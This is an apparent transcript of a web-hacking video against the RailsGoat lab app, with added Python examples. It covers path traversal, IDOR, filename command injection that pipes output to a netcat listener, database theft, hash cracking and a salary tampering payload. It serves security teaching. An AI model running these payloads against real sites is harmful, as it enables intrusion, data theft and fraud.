How hackers hack any website in minutes?!
Aug 28, 2023

Today I will show you how you can be as handsome as Mr. Hackaloy. I'm just kidding. I will teach you how to reach hacking status, which is much easier. Now, before we start, kids, remember that hacking is illegal. If you get caught hacking there really isn't much I can do to help you: the police will knock on your door and arrest you, and the next thing you know you'll never see Mr. Hackaloy again. So here is a list of the things attackers might be doing.

First of all, you have a target website, and you enter its URL. In this case you could say loiliangyang.com is your target. Well, I mean, we're not here for online shopping. The next thing you do is point at the server from an operating system like Kali Linux, which comes loaded with all these different hacking tools and scripts, and look for potential vulnerabilities in the site. The vulnerabilities could be, for example, SQL injection, or OS command injection in one of the site's features. The craziest thing is that we can even change the information the site displays. The reason we can do that is that behind every website there is a gigantic database of information: usernames, passwords, salary information (okay, that's very juicy) and a lot of other data we can target.

Before we start, kids, this is going to be a pretty long tutorial and you're going to need at least 15 cups of coffee.
I already have 25. And remember, children, with great power comes great responsibility. What you need to do now is turn on notifications and subscribe to the channel so you don't get hacked.

Right in front of us we are on Kali Linux, which is going to be your best friend here. Of course your best friend forever is Hackaloy, and the next best friend is Kali Linux. So what I can do now is open a browser, in this case Firefox, and go to the site by entering the URL. In my case I enter http://192.168.0.184/railsgoat, and this is the website we will be pointing at. In other cases you could say loiliangyang.com is the target site, but if you really point at loiliangyang.com, I assure you that I will find your IP address, your location, your name, your password... oh, don't worry, I'm just helping you find your password. So right in front of us we are on the login page, and we can either log in to the site or register an account. Either way, we are trying to figure out the structure of the application; we have to really understand how data flows from the browser to the backend system. In this case I have already created an account, so I can go ahead and log in.
Here I enter hackaloy@hackaloy.com, as you can see, then the password, and click Log in. That's it, we're logged in. This looks like an HR system: we have the 401K, PTO available, sick days, income and so on, and on the left side you see all the different parts or pages of the site we can go to. The first thing a professional hacker should do is go through each of these pages to understand the structure of the application from the inside out: how the pages work and what the URLs are. And right here we have something quite interesting.
If you look at the URL, we have /users/, then a number, and then another page called benefit_forms. This tells us a lot: if I created another user, the 7 would become another digit. The other thing we see on this page is health insurance, dental insurance, and the ability to upload a file. If I click on health insurance we get a PDF document, and again look at the URL.

It ends with download?name=<file>.pdf&type=file, which is quite interesting: this is a possible entry point or injection point for us. Dental insurance is the same, name=<file>.pdf&type=file, another possible entry point. The reason I say this could be an entry point is that if I changed the name to ../../../ followed by some other path, could I access a completely separate file of interest simply by pointing it at a different file name or path? And maybe you're thinking:
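To make the traversal idea concrete, here is an added Python example that is not from the video and not RailsGoat's code. It models a download handler that joins the name= value onto a document directory (the directory path is a hypothetical stand-in), shows how ../ walks out of it, builds the kind of name= value used later in the walkthrough, and shows the containment check a fixed handler has to make after normalising the path.

```python
import os

# Hypothetical directory a download?name=... handler is meant to serve from.
# The walkthrough never shows RailsGoat's real document root; this is a stand-in.
BASE_DIR = "/owaspbwa/railsgoat-git/public/docs"


class TraversalError(ValueError):
    """Raised when a requested name resolves outside the serving directory."""


def vulnerable_resolve(base_dir, name):
    """Join the user-supplied name onto base_dir with no containment check.
    Any ../ in name walks out of base_dir; this is the bug class being probed above."""
    return os.path.normpath(os.path.join(base_dir, name))


def safe_resolve(base_dir, name):
    """Resolve symlinks and ../ first, then refuse anything outside base_dir.
    Checking before normalising, or string-matching on '../', is what attackers bypass."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise TraversalError(f"refusing {name!r}: resolves to {target}")
    return target


def traversal_payload(depth, absolute_path):
    """Build a name= value: enough ../ to reach /, then the absolute path wanted
    (later in the walkthrough, the SQLite database under the application root)."""
    return "../" * depth + absolute_path.lstrip("/")


if __name__ == "__main__":
    payload = traversal_payload(5, "/owaspbwa/railsgoat-git/db/development.sqlite3")
    print("payload:", payload)
    print("vulnerable handler serves:", vulnerable_resolve(BASE_DIR, payload))
    try:
        safe_resolve(BASE_DIR, payload)
    except TraversalError as e:
        print("hardened handler:", e)
```

Note that an absolute name such as /etc/passwd is also caught by safe_resolve, because os.path.join discards the base when the second argument is absolute and the commonpath check then fails.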
Mr. Hackaloy, why aren't you doing a brute-force attack against the login page? Normally, on a website with a login page, what hackers do is point at the login page with all sorts of email addresses that they may have already collected, together with passwords: all the different combinations of commonly used passwords like 12345678, password, and so on, injected directly into the login fields. The downside is that this is easily detected and blocked at the application or firewall level. So we need to be more creative in our approach. What we will do now is go to the top-right corner and turn on our interceptor; in this case we use Burp Suite as the interceptor, to see all the different requests that are sent to the application server. The next thing, if you want to look like a hacker, is to open the terminal and type burpsuite, press Enter, and now we're opening our interceptor: the Community Edition of Burp Suite. Click Start Burp, go to the Proxy tab and turn Intercept on. Once we have that, go back to the site, click Upload file, click Add file, and in this case I can upload a normal, harmless text file. Click Start Upload, and we're intercepting right now, okay?
Go back to Burp Suite Community Edition. This one is a live request, so go ahead and drop it, and right here we have the railsgoat upload POST. Right-click and Send to Repeater. The reason I'm sending it to Repeater is that I want to understand what is in the HTTP request that will be sent to the application server. Here we can see the following: POST is the HTTP method, so we're uploading, or posting, to the destination URL, which is the railsgoat upload path.

Then we have the User-Agent information from the browser, Accept, Accept-Language and the Content-Type, which in this case is multipart/form-data. We have the Referer, and then the actual session value, your session identity, which is sent as part of the Cookie. As I scroll down we have Upgrade-Insecure-Requests and then the Content-Disposition for each form field: a utf8 field containing a tick (✓), possibly a way of indicating a legitimate request; an authenticity_token, which is interesting and could be data they use later; a benefits backup field set to false, which is interesting because whenever a boolean value is sent as a parameter, true or false, we should ask what happens if we change it a little; and then something called benefits upload.
That field holds the file, with the file information right at the bottom: the hackaloy salary document and so on, which was part of another tutorial we did. To accelerate your learning: when you run all these different checks and scans you are looking for vulnerable openings. The idea behind hacking a website, or hacking as a whole, is to find entry points, injection points, whether that is SQL injection or OS command injection. The goal is to find a part of the site that is vulnerable. So in this case, what happens if I change backup to true?

The benefits backup field suggests the uploaded file is copied to a backup directory. Could that be the case? We don't know, because this is black-box testing: we have no idea about the structure of the application and we need to find out first. So if I change this to true, what happens? Click Send, and on the right you see we're being redirected back to /railsgoat/users/7/benefit_forms, which is to be expected. If I change it back to the default of false and click Send, same thing. All good, not many changes seen, so there might be some instructions being executed, either inside the app itself or at the operating system level, as part of the structure of this application, and we want to take advantage of that. To continue, we can also click other pages. In this case we have the 401K information, and once again you can see the URL: /railsgoat/users/7/retirement. Then PTO, Job information and so on. Possibly one of them has a vulnerability, which means that if we change this value here we could see something else. So let's say I change the 7 to 6.
I press Enter on that and boom, we see someone else's data. I enter 5 and we see Ken Johnson's data. So again, some parts of the site are vulnerable and others are not, and these are all the different things you can try to see whether you have a vulnerable entry point to go after. These are all possibilities you can use as part of executing your attack. Next, you have Messages on the left; when you click on Messages you can send messages to the different users within the app, and they are stored in the backend database. Usually, if you can send messages, you may be thinking about a cross-site scripting attack: this is a point where you can inject your own script, and when the user opens the message it possibly redirects them to hackaloy.com. Those are things you can do as part of sending the message: send some script along with it. And finally, don't miss our ending.
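Added example, not from the video: a small Python checker for the /users/<id>/<page> pattern above. It requests each candidate id with one user's own session and reports the ids that come back 200 with content different from that user's own page, which is the insecure direct object reference shown when 7 became 6 and 5. Redirects are not followed, so a bounce to the login page is not mistaken for a hit. The fetch function is pluggable so the logic can be exercised offline; the base URL, cookie value and page names in the usage are taken from the walkthrough or constructed.

```python
from urllib.error import HTTPError
from urllib.request import HTTPRedirectHandler, Request, build_opener


class _NoRedirect(HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = build_opener(_NoRedirect)


def http_fetch(url, cookie):
    """Live fetcher: GET url with a captured session cookie; returns (status, body)."""
    req = Request(url, headers={"Cookie": cookie})
    try:
        with _OPENER.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def find_idor(base_url, page, own_id, candidate_ids, cookie, fetch=http_fetch):
    """Insecure direct object reference check for /users/<id>/<page>.

    Fetch our own page first as the reference, then every other candidate id with the
    same session. An id is reported when the server answers 200 with content that is
    not our own page: someone else's record served without an ownership check.
    3xx, 403 and 404 responses are not reported.
    """
    _, own_body = fetch(f"{base_url}/users/{own_id}/{page}", cookie)
    exposed = []
    for uid in candidate_ids:
        if uid == own_id:
            continue
        status, body = fetch(f"{base_url}/users/{uid}/{page}", cookie)
        if status == 200 and body != own_body:
            exposed.append(uid)
    return exposed


if __name__ == "__main__":
    # Lab target from the walkthrough; the cookie value is a placeholder to replace
    # with the session cookie captured in Burp.
    base = "http://192.168.0.184/railsgoat"
    cookie = "session=REPLACE_WITH_CAPTURED_COOKIE"
    for page in ("retirement", "benefit_forms"):
        print(page, find_idor(base, page, 7, range(1, 11), cookie))
```

Comparing bodies rather than only status codes matters because many applications answer 200 for every id and only vary the content; comparing against the caller's own page filters out the one legitimate hit.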
If you go to the top-right corner you can click on Account Settings, where you can also update your personal information. So turn FoxyProxy back on, enter the first name, I'll say Hackaloy, then a password and password confirmation, and click Submit. I go to Burp Suite, to the Proxy tab, and go ahead and drop this one.

I'd leave the live railsgoat request, and in this case we have the users/7.json POST; at the bottom you see the first name, password and password confirmation, all these different details. If I send it to Repeater, in the second Repeater tab you can see the different information sent to the backend system. Behind every application server is a database, and we also want to find out what type of database they are using. Is it Microsoft SQL Server? Is it MySQL? PostgreSQL? SQLite? All these different possible databases are what we're targeting as part of the hack. As far as testing goes, we really want to understand what the potential areas, entry points or injection points are, so as part of the testing you run checks against all these different parameters and input fields, and say you have found that a file name is susceptible to operating system command injection. In that case, under the file name, you can test it: in this situation I can enter ls, and then a connection to the hacker's machine, which in this case is at 192.168.0.118 on port 4444. What this does is send the output of ls, a listing of the files and directories in the current working directory, to the hacker's machine. So I go ahead and set up netcat: I enter ip addr, which shows the hacker's IP address, 192.168.0.118, and then nc -nlvp 4444, so our listener is now set up. I go back to Burp Suite, and what I have there is the file name set to ls | nc 192.168.0.118 4444. So if I click Send, let's see what we get.
I go back to the netcat listener and we can see the following information. There you have it: you have hacked the machine. This is the current directory of the running application server, and we have several interesting directories here, possibly including the database configuration. These are the different goals we're looking for, because we want to know whether usernames or passwords are stored somewhere. So with the OS command injection we can map out the structure of the application very cleanly. What I can do now is change this a little: I want to know what the current working directory is, so I use pwd, which is print working directory, and again send the output to the hacker's machine. Set up the listener again, go back to Burp, click Send, and you can see we have /owaspbwa/railsgoat-git. What I've done here is copy the OS command injection results so that we understand the application is running in /owaspbwa/railsgoat-git.
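Added Python example, not from the video and not RailsGoat's own code: a stand-in for a handler that interpolates an uploaded file's name into a shell command, next to the argv-based version that does not have the bug, a filename validator for defence in depth, and the helper that builds the ls | nc payload used above. echo stands in for whatever command the real handler runs on the file; the injected text is constructed.

```python
import subprocess

# Characters that let a filename break out of a shell command. The walkthrough mentions a
# filter on slashes, quotes and semicolons; this is the fuller list a reviewer checks.
SHELL_METACHARS = set(";|&`$<>()\n\r'\"\\")


def run_vulnerable(filename):
    """Build a shell string from user input and hand it to /bin/sh (shell=True).
    The shell parses the filename, so 'x; id' runs id. echo is the stand-in command."""
    return subprocess.run(f"echo {filename}", shell=True,
                          capture_output=True, text=True).stdout


def run_safe(filename):
    """Same operation with an argv list: no shell parses the filename, so ';', '|'
    and friends are just bytes inside one argument."""
    return subprocess.run(["echo", filename], capture_output=True, text=True).stdout


def is_safe_filename(filename):
    """Second layer: reject names carrying shell metacharacters or path separators.
    Never rely on this alone; the argv form above is what actually removes the bug."""
    return not any(c in SHELL_METACHARS for c in filename) and "/" not in filename


def exfil_payload(command, attacker_ip, port):
    """The payload shape from the walkthrough: run a command and pipe its output to a
    listener started on the attacker's machine with: nc -nlvp <port>."""
    return f"{command} | nc {attacker_ip} {port}"


if __name__ == "__main__":
    print(run_vulnerable("salary.doc; echo INJECTED"), end="")   # two lines: injected
    print(run_safe("salary.doc; echo INJECTED"), end="")         # one line: literal
    print(exfil_payload("cd db; ls", "192.168.0.118", 4444))
```

The point of the pair is that the fix is not escaping characters the attacker might use but never letting a shell see the input; the validator exists only to fail loudly when someone tries.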
We are in /owaspbwa/railsgoat-git, and of course we're pointing at the db directory, which could well hold the database we're really interested in, because it could show us information like usernames, password hashes and so on, which would allow us to do other things. So we go back to Burp Suite, and in this case we want to look at what's inside the db directory. You'll see here that we've changed the operating system command a little: we cd into the db directory and then run ls. What we're doing now is going into the database directory and then listing it. So do the same as before: set up your listener.

Go back to Burp Suite and click Send. Go back to the listener, and you can see development.sqlite3, schema.rb, seeds.rb and test.sqlite3. What we want to do now is find a way to download that file. In this situation, if I go back to the railsgoat download URL with the name parameter, I can try to point it at the directory that contains development.sqlite3. What I do is use ../ sequences: the reality is that we don't know the download handler's current working directory, but with five of them we get back to the root directory and can then point at what we need. Coming back here we have /owaspbwa/railsgoat-git, so I go back to the URL, paste that in, delete the original file name, and add /db/development.sqlite3. If I go back and review the results, this is the file we're going after. I go back to the browser, press Enter, and now we can save the file.
Alright, let's go ahead and save it and replace the file (I already did this during setup and testing). We managed to download the file thanks to a vulnerability, another entry point that lets us pull information out of the operating system. At this point I am very happy to declare that you are no longer a script kiddie. What we're going to do now is interrogate, or query, the file. I enter sqlite3 followed by development.sqlite3, press Enter, and now we can query the database. Enter .tables and we see all the different tables inside the application: benefits, paid_time_offs, retirements, users (users is pretty interesting), messages, pay_schedules, job_infos and so on. These are all the tables we're targeting. So let's interact: enter select * from users; press Enter, and boom, this is super cool. We have admin@metacorp.com, we have Jack, Jim, Mike, Ken, loiliangyang@gmail.com, hackaloy too, so these are all the different users, and the next column looks like some kind of hashed password. We could go back to rainbow tables, where we have the whole list of commonly used passwords hashed with the same algorithm, do a reverse lookup, and see whether we can get all these beautiful details right here. You can also enter .schema followed by the table name to see its structure; in this case I enter users, press Enter, and you can see the columns: the first is id, the second email, the third password, then admin, which is interesting: whether the user is an administrator or not, true or false, pretty simple. Then we have user_id, which as you can see is assigned incrementally: one, two, three, four, five, six and seven. And finally we have the auth token, which is another interesting piece of information that we could possibly use, for example to try to hijack another user's session. Now, before we continue:
You may be wondering why I didn't go straight for a reverse shell, especially now that I have the ability to execute operating system commands. So before we continue, what exactly is a reverse shell? You have the target server on the left and Mr. Hackaloy on the right. Through the OS command injection you execute a command on the server that connects back to Mr. Hackaloy's machine, and then we can remotely control the entire computer. The reason I can't do that in this tutorial is that there is some kind of sanitization of the application's input, or possibly a firewall protecting the application. As you can see, right in the middle there appears to be a firewall, and the firewall, or possibly a filter integrated into the application layer, is filtering out some of the common special characters like slashes, single quotes, double quotes and possibly semicolons as well. All these special characters can be removed entirely as part of protecting the application against these different types of attacks.
Going back to the analysis: is there a way for us to update our salary information? That's pretty interesting. Let's say select * from job_infos; press Enter, and we can see user_id 7 with an income of sixty thousand dollars. So is there a way to change this to a million? The answer is yes, and we need a combination of several things. For this trick to work, the first thing we need to do is write a file containing some instructions, and the second is to run that file, which then feeds the instructions in for execution. So that's what we're going to do here. I enter the following: we cd into db, and remember that the filter is escaping the single quotes, the forward slashes and the backslashes, so we're very limited in what we can do. So what we have here is the final payload.

What we do is change directory into db and echo an update statement: update the job_infos table, setting income to 100000 where user_id equals 7, with a semicolon to end the SQLite command (which is again, in this case, a structured query language command). The single quotes let us delimit what we want to echo, we save it to a file inside the db directory, and then we put a hash, which comments out the rest of the OS command. Super clean, super neat, super smart. Once you're done, click Send, and that's it: the file is now created on the backend.
You can easily check that. If you want to verify it, run cd db again and ls -l, followed by | nc 192.168.0.118 4444, which again lets us send that information out through the OS command injection we discovered as an entry point. I run nc -nlvp 4444, press Enter, go back to Burp Suite, click Send, and see what we get. Back in the listener I can see our new file, with a timestamp of just now.

Of course, you can also cat the file to read back its contents. What we want to do now is go back to Burp Suite and run the update, so this is the final payload: we change directory into db again, run sqlite3 development.sqlite3 with the instructions in the file as its input, which update the job information so that Hackaloy gets a better salary, and of course we have the hash at the end to comment out the rest of the OS command. Once it's ready, click Send, boom. I go back to the browser, click Job information, and here we have an income of a hundred thousand dollars. So thank you for giving me a better salary.
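Added Python example, not from the video, covering both the database querying above (the .tables, select * from users and reverse-lookup steps) and the salary update: a constructed in-memory stand-in for development.sqlite3 with the users and job_infos tables, the queries, a dictionary reverse lookup of the stored password hashes (unsalted MD5 is an assumption about the app; swap in the real algorithm once you know it), and the update statement that was echoed into a file and fed to sqlite3. Every row and password here is made up for the example, and the file name inject.sql and the < redirection in the two payload strings are assumptions, since the video does not show them.

```python
import hashlib
import sqlite3

# Shell payloads in the shape described above (file name and '<' are assumptions).
INJECTED_SQL = "update job_infos set income=100000 where user_id=7;"
WRITE_PAYLOAD = f"cd db; echo '{INJECTED_SQL}' > inject.sql #"
RUN_PAYLOAD = "cd db; sqlite3 development.sqlite3 < inject.sql #"


def build_constructed_db():
    """In-memory stand-in for the downloaded development.sqlite3. Column names follow
    what the walkthrough reads out of .schema; rows and passwords are made up."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table users (
            id integer primary key, email text, password text,
            admin boolean, user_id integer, auth_token text);
        create table job_infos (id integer primary key, user_id integer, income integer);
    """)
    seed = [  # (user_id, email, plaintext the stored hash is derived from, admin, income)
        (1, "admin@metacorp.com", "n0tInAnyW0rdlist!", 1, 250000),
        (5, "ken@metacorp.com", "password", 0, 80000),
        (7, "hackaloy@hackaloy.com", "hunter22", 0, 60000),
    ]
    for uid, email, pw, admin, income in seed:
        con.execute("insert into users values (?,?,?,?,?,?)",
                    (uid, email, hashlib.md5(pw.encode()).hexdigest(), admin, uid, f"tok{uid}"))
        con.execute("insert into job_infos (user_id, income) values (?,?)", (uid, income))
    con.commit()
    return con


def list_tables(con):
    """What .tables shows in the sqlite3 shell."""
    rows = con.execute("select name from sqlite_master where type='table' order by name")
    return [r[0] for r in rows]


def dump_users(con):
    """select * from users, as (id, email, password_hash, admin, user_id, auth_token)."""
    return con.execute("select * from users order by id").fetchall()


def income_for(con, user_id):
    return con.execute("select income from job_infos where user_id=?", (user_id,)).fetchone()[0]


def crack_hashes(con, wordlist):
    """Reverse lookup: hash each candidate once, then match against every stored hash.
    This only works because the hashes are unsalted; a salted hash costs one pass per user."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    found = {}
    for _, email, pw_hash, *_ in dump_users(con):
        if pw_hash in table:
            found[email] = table[pw_hash]
    return found


def apply_injected_update(con, sql=INJECTED_SQL):
    """Run the statement the payload writes to inject.sql, as sqlite3 < inject.sql would."""
    con.executescript(sql)
    return income_for(con, 7)


if __name__ == "__main__":
    db = build_constructed_db()
    print(list_tables(db))
    print(crack_hashes(db, ["123456", "password", "hunter22", "qwerty"]))
    print("before:", income_for(db, 7), "after:", apply_injected_update(db))
    print(WRITE_PAYLOAD)
    print(RUN_PAYLOAD)
```

The admin row is deliberately not in the wordlist, so the lookup returns only the two weak passwords; that is the realistic outcome of a wordlist attack on an unsalted hash column and the reason the next step in the walkthrough targets job_infos directly rather than the admin account.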